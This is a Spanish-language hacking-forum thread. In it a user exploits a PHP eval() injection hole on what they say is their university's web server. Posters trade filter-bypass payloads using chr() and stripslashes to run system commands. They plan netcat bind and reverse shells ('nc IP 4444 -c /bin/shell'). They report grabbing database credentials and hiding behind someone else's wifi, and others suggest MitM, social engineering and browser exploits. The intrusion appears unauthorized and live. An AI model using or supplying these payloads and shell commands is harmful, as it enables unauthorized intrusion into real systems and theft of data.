pues... el tema es que probando offline el codigo de WHK si que me ha funcionado, pero a la hora de implementarlo en la web no... no se porque, a ver si vosotros me echais una mano ( OTRA! xD ), os pongo el funcionamiento más "real" de la web:

• La pagina recibe por GET el "idioma" al que quiers cambiar, es decir, $_GET["lang"] y lo almacena en una variable llamada $lang
• Esa pagina, llamémosla changelang.php te redirecciona al index.php
• Ya el index.php es el encargado de hacer eval("echo RECENT_".$lang.";");

no se realmente si este proceso de paso por variable local en vez de por GET altera el funcionamiento de el sistema :/

Bueno después de este repertorio de palabras "raras" que has soltado vamos al tema xD:

catwarez.php?ta=JuegosPortables

me da por pensar que puede haber LFI ( local file inclusion ), usabas la variable recibida por get para indicar la pagina a la que se entraba?


o bueno... el tipico sqli que tu mismo mencionaste antes

omg no eres consciente hasta que punto se complica el asunto, no puedo insertar ni comillas, ni espacios ni simbolos raros ( como backslashes ) por ejemplo ese código que tu has puesto ahi se transforma en:

system(chr(39).echo.chr(32).tal.chr(62).hola.chr(46).php.chr(39))

con:    '    = chr(39)          (espacio) = chr(32)     >  = chr(62)   .   = chr(46)

con lo que intentar hacer una "shell" decente... me costaría la misma vida xD


pD: el simbolo del > si s puede introducir, pero bueno, es tan solo un caracter entre la marea de ellos

yo creo que el problema es que veis todo bajo el mismo punto de vista:

-Escaneo host en busca de puertos abiertos / servicios vulnerables
-Metasploit hace el resto por mi...

Qué pasa? que cuando queda parcheado un fallo TYPICAL pues se acaba el juego... hay mil cosas que pueds hacer, para empezar si un host está descargando desde el bittorrent, quizá sea vulnerable a ataques MitM que te permitan modificar los paquetes ( aunque este tipo de técnicas suelen ser complicadas ), prueba con ingeniería social... algun tipo de java applet infection ( hay varios posts en este foro sobre ello ), prueba con las 3333 vulnerabilidades que han salido recientemente en productos Adobe ( acrobat reader ) o con las de iexplore ( aurora ) o con las de Firefox... hay muchos caminos y restringirse tan solo al metasploit es lo peor que pueds hacer.

un saludo!

gracias por contestar de nuevo =)

WHK

no puedo usar los print_r porque requieren cadenas, y como dije al principio están activados los magic_quotes así que no se muy bien como realizar esas operaciones, intenté con chr(39), que viene siendo la comilla simple, pero no procesa bien de esa manera...

recuerdo que el código vulnerable es el siguiente

eval("echo PERICO_".$_GET["x"].";");

Azielito

Ya especifiqué que el codigo no puedo modificarlo yo... se trata de una vulnerabildad, no es un foro, es una web de servicios, sin más


All

Dado que puedo lanzar system() exec() passthru() etc... se me había ocurrido lanzar un

nc -l -p 4444 -c /bin/shell

o una inversa

nc IP 4444 -c /bin/shell

pero he tenido algunos problemas haciendo una prueba local, se ve que mi router no hace correctamente la traduccion de IPs privadas a Publicas ( NAT ) asi que..., y tampoco me quiero arriesgar a dejarlo a la escucha en el servidor, que eso es facilmente detectable, además se registraría mi ip... ( que por otra parte...tampoco es mia, es una wifi de por ahi xD )

He obtenido los datos de la conexion de la base de datos, hay una mysql y una oracle, pero... el firewall está configurado para tan solo aceptar peticiones desde dentro... así que por eso me es tan importante instalar una shell dentro.


PD: no se si esto está tomando tintes para estar en el tema de hacking general... pero como aun tengo que pasar funciones mediante el eval() y el system() de php, pienso que aun tiene cabida aquí


Un saludo y gracias ^^

hmmm jaja pero quizá no m expliqué bien, el código obviamente no lo puedo modificar yo... es un servidor web, tan solo puedo explotar dicha vuln :S

si si, algo de php si que se, el asunto es que como están activadas las magic quotes (como puse arriba), no me deja más que insertar comillas simples mediante el stripslashes y no funciona bien... ciertamente no lo entiendo, por que por ejemplo si que puedo poner   system(ls.chr(32).chr(45).la) quedando
ls -la  si que funciona, pero sin embargo si pong system(echo.chr(32).a)  (echo a) por ejemplo, que debería mostrarmelo por pantalla, no suelta nada... y no termino de cogerlo...

EDITO:

hmmm 

a;stripslashes(system('echo'.chr(32).'cosa>a.txt'))

así si que me deja, bueno un saludo y sigo a la escucha de posibles opciones de explotación (gracias de nuevo braulio)

PD: edito por si a alguien le interesa seguir la evolucion de un newbie xDD

veis pq amo tanto esta comunidad... jajaja gracias braulio

alguien me sabría decir como podria escribir en un php? es que he descubierto un directorio en el cual se puede escribir, habia pensado en ( pero no me va eh xD ) :



es decir -> echo a > pagina       ( como ejemplo, m refiero )

la idea es.. obviamente hacer una shell algo más facilita, pq me estoy rompiendo la cabeza

• He probado con el método de conversion a hexadecimal... y no me funciona, por si acaso probé a poner tan solo system(ls) que en hexa queda system(0x6c73)  pero ni sikiera así me dejó, estás seguro que se puede incluir hexadecimal en la llamada a la funcion system?
• Tambien e probado con el stripslashes pero no me funcionó, no se si me estoy confundiendo en la manera en que se aplica... ;system(stripslashes("ls -la"))   , eso es lo que puse, teniendo en cuenta que si pongo solo ;system(ls)  funciona bien  ( es decir, el punto y coma del final t lo añade el código )

no se si son errores mios, o proteccion de la web, en cualkier caso muchas gracias por ayudarme y apreciaría si pudieseis seguir haciendolo, un saludo

pD:  ese es el código fatídico, lo pongo por si sirve de algo xD


EDITO:

He conseguido hacer un "apaño", el tema de las comillas quedó solucionado usando stripslashes como dijo whk, pero apareció un nuevo inconveniente, no podia insertar espacios, así que use la funcion chr()
en concreto, chr(32) para insertar el espacio... El problema viene ahora, se ve que no tengo privilegios suficientes ni sikiera para moverme por directorios...(obviamente tampoico para crear archivos :$ ), no se porque cuando realizo system(cat index.php) por ejemplo, en vez de mostrarme el código es como que se "inserta", pero solo el codigo html... es decir como si bajasemos el index.php con "guardar como"...

no se me ocurre nada más, dado que no puedo escribir en el directorio en el que se encuentra...alguna sugerencia?

Huuula, bueno, dada la pericia de los peogramadores de mi facultad, e descubierto una vulnerabilidad de tipo php injeciton, mediante un eval($_GET["x"]);

si...son así de habiles allí.... ell caso, esk que para continuar con su nivel tiene actividas las magic quotes con lo que no puedo ahcer por ejemplo     ?x=system("ls -la");       porque me escapa las comillas...

de hecho estoy muy limitado en el uso de comandos puesto que la funcion system recibe una cadena y tal y cual. Por favor sugerencias? algun tipo de bypassing?


Gracias por adelantado

pD: tambien me serían útiles algunos comandos (linux) que puedan ser escritos en una sola palabra, es decir sin espacios